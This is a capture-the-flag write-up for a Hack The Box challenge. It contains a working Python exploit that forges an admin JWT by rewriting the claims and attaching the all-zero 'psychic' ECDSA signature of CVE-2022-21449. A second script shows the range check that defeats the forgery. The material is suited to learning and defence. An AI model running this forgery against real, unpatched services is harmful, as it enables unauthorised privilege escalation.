
HackTheBox Read Before You Sign Writeup

Explore the basics of web security in the Read Before You Sign Challenge on Hack The Box. This easy-level Challenge introduces JSON Web Token (JWT) manipulation and the consequences of weak signature validation in a clear and accessible way, perfect for beginners.

https://app.hackthebox.com/challenges/789

Description

E Corp’s control hinges on their ability to manipulate and monitor the population. A crucial system has been infiltrated, and it contains vital information about the EverLast chemical. As a member of the immune group, your mission is to gain administrator privileges within the system and access confidential secrets. The system’s defenses appear robust, but we believe there’s a vulnerability waiting to be exploited due to their outdated infrastructure. Discover the hidden truths and help us dismantle their control over society. The future of our freedom rests in your hands.

Exploitation

import re
import sys
import requests
from base64 import urlsafe_b64decode, urlsafe_b64encode

# Fixed signature the PoC attaches to the forged token. It base64url-decodes to
# 30 06 02 01 00 02 01 00: DER SEQUENCE { INTEGER 0, INTEGER 0 }, i.e. an ECDSA
# signature with r = 0 and s = 0. A verifier that does not range-check r and s
# accepts it for any key and any message, so no signing key is needed.
ZERO_SIGNATURE = "MAYCAQACAQA"

def get_base_url():
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <ip:port>")
        sys.exit(1)
    # No trailing slash: every path below starts with one.
    return f"http://{sys.argv[1]}"

URL = get_base_url()

def b64url_decode(segment):
    # JWT segments are base64url with the padding stripped; restore it before
    # decoding (plain b64decode chokes on missing padding and on '-' / '_').
    return urlsafe_b64decode(segment + "=" * (-len(segment) % 4))

def b64url_encode(raw):
    return urlsafe_b64encode(raw).rstrip(b"=").decode()

def craft_admin_token(jwt):
    # Keep the issued header (alg, typ) as-is, rewrite the claims, and attach
    # the all-zero signature instead of re-signing.
    header, payload, _ = jwt.split('.')
    # Blunt substitution: this rewrites every 'user' substring in the claims
    # (e.g. inside "username"), not only the role value.
    new_payload = b64url_encode(b64url_decode(payload).replace(b'user', b'admin'))
    return f"{header}.{new_payload}.{ZERO_SIGNATURE}"

def jwt_user():
    # Register a low-privilege account, then log in to obtain a legitimately
    # issued token whose header and claim layout the forgery reuses.
    creds = {"username": "htb_user", "password": "htb_user"}
    requests.post(f'{URL}/register', data={**creds, "email": "user@htb.eu"})
    response = requests.post(f'{URL}/login', data=creds)
    if response.status_code != 200:
        print(f"Error during login: {response.text}")
        sys.exit(1)
    token = response.cookies.get('token')
    if not token:
        print("Error: JWT token not found in cookies")
        sys.exit(1)
    return token

def send_admin_token(token):
    # /list is the admin-only endpoint; the flag is in its response body.
    response = requests.get(f'{URL}/list', cookies={'token': token})
    match = re.search(r'HTB\{.*?\}', response.text)
    return match.group(0) if match else "Flag not found"

if __name__ == '__main__':
    admin_token = craft_admin_token(jwt_user())
    flag = send_admin_token(admin_token)
    print(flag)

Summary

Read Before You Sign Challenge on Hack The Box involves forging a JSON Web Token (JWT) to escalate privileges. The PoC registers a standard user, logs in to obtain that user's JWT, base64url-decodes the payload and rewrites its role from user to admin. It never re-signs the token: the third segment is replaced with the fixed value MAYCAQACAQA, which decodes to the DER bytes 30 06 02 01 00 02 01 00, an ECDSA signature with r = 0 and s = 0. A correct ECDSA verifier rejects that before doing any curve arithmetic, because r and s must both lie in [1, n-1]; the Java releases affected by CVE-2022-21449 ("Psychic Signatures") skipped that check and accepted the all-zero signature for any key and any message, which fits the "outdated infrastructure" hint in the description. The forged token therefore passes the server's signature check, and the admin-only /list endpoint returns the flag. The lesson is that a JWT is only as trustworthy as the signature verification behind it: rewriting claims is trivial, so the server must validate the signature's structure and range and verify it against the issuer's key with a patched library, not merely check that the token parses.
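To make the signature side of the attack concrete, the following is an added example in Python, written for this writeup and not code from the challenge or the original PoC. It decodes a JWT with proper base64url padding, parses the PoC's DER-encoded signature into (r, s), shows the range check a correct ECDSA verifier performs (which the all-zero signature fails), and forges an admin token the same way the PoC does. Assumptions not stated on the page: the token uses ES256 over P-256 (so the group order below is P-256's), the claim is named role, the sample token is constructed here with a placeholder r = s = 1 signature, and the DER parser handles only short-form lengths, which covers every P-256 signature.

```python
import base64
import json

# Order of the P-256 (secp256r1) group. Assumption: the writeup does not name
# the curve; P-256 is what the ES256 JWT algorithm uses.
P256_ORDER = 0xFFFFFFFF00000000FFFFFFFFFFFFFFFFBCE6FAADA7179E84F3B9CAC2FC632551

# DER SEQUENCE { INTEGER 0, INTEGER 0 }: the all-zero ECDSA signature.
ZERO_SIGNATURE = base64.urlsafe_b64encode(bytes.fromhex("3006020100020100")).rstrip(b"=").decode()


def b64url_decode(segment: str) -> bytes:
    """JWT segments are base64url with the padding stripped; restore it."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def parse_der_ecdsa_signature(sig: bytes) -> tuple:
    """Parse DER SEQUENCE { INTEGER r, INTEGER s } into (r, s).

    Java's SHA256withECDSA Signature API consumes this DER form, which is why
    the PoC's signature is DER rather than the raw r||s bytes RFC 7518 defines
    for ES256. Only short-form lengths (< 128 bytes) are handled; that is
    enough for any P-256 signature (at most 72 bytes).
    """
    if len(sig) < 2 or sig[0] != 0x30:
        raise ValueError("not a DER SEQUENCE")
    if sig[1] & 0x80 or sig[1] != len(sig) - 2:
        raise ValueError("unsupported or inconsistent SEQUENCE length")
    pos, values = 2, []
    for _ in range(2):
        if pos + 2 > len(sig) or sig[pos] != 0x02:
            raise ValueError("expected INTEGER")
        length = sig[pos + 1]
        if length & 0x80 or pos + 2 + length > len(sig):
            raise ValueError("unsupported or truncated INTEGER length")
        values.append(int.from_bytes(sig[pos + 2:pos + 2 + length], "big"))
        pos += 2 + length
    if pos != len(sig):
        raise ValueError("trailing bytes after signature")
    return values[0], values[1]


def signature_params_in_range(r: int, s: int, order: int = P256_ORDER) -> bool:
    """The check a correct ECDSA verifier runs before any curve arithmetic:
    r and s must both lie in [1, order - 1]. If r = 0 is let through, the
    verification equation degenerates and every message verifies under
    every key, which is what the PoC's fixed signature exploits."""
    return 1 <= r < order and 1 <= s < order


def signature_is_well_formed(token: str, order: int = P256_ORDER) -> bool:
    """Structural and range validation of a token's signature segment. This is
    the step a vulnerable verifier skipped; a real verifier must still run the
    curve math against the issuer's public key afterwards."""
    try:
        _, _, sig = token.split(".")
        r, s = parse_der_ecdsa_signature(b64url_decode(sig))
    except ValueError:  # binascii.Error (bad base64) is a ValueError subclass
        return False
    return signature_params_in_range(r, s, order)


def decode_claims(token: str) -> dict:
    return json.loads(b64url_decode(token.split(".")[1]))


def forge_admin_token(token: str) -> str:
    """Keep the header, rewrite the role claim, attach the all-zero signature.
    Assumption: the claim is named 'role'; the writeup's PoC instead replaces
    the substring 'user' wherever it appears."""
    header = token.split(".")[0]
    claims = decode_claims(token)
    claims["role"] = "admin"
    new_payload = b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    return f"{header}.{new_payload}.{ZERO_SIGNATURE}"


def make_sample_token() -> str:
    """Constructed sample token (not from the challenge): ES256 header, a
    low-privilege claim set, and a placeholder DER signature with r = s = 1
    that passes the range check but is not a real signature."""
    header = b64url_encode(b'{"alg":"ES256","typ":"JWT"}')
    payload = b64url_encode(b'{"username":"htb_user","role":"user"}')
    sig = b64url_encode(bytes.fromhex("3006020101020101"))
    return f"{header}.{payload}.{sig}"


if __name__ == "__main__":
    legit = make_sample_token()
    forged = forge_admin_token(legit)
    print("zero signature segment:", ZERO_SIGNATURE)
    print("forged claims:", decode_claims(forged))
    print("sample token passes range check:", signature_is_well_formed(legit))
    print("forged token passes range check:", signature_is_well_formed(forged))
```

Run it as-is to see that the forged token's signature segment is exactly the PoC's MAYCAQACAQA and that the range check rejects it while accepting the placeholder signature. In a real service the same check is only the first gate; the library must then verify (r, s) against the issuer's public key, and the fix for the underlying bug is to run a patched JVM and a JWT library that does not trust the platform verifier blindly.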

This post is licensed under CC BY 4.0 by the author.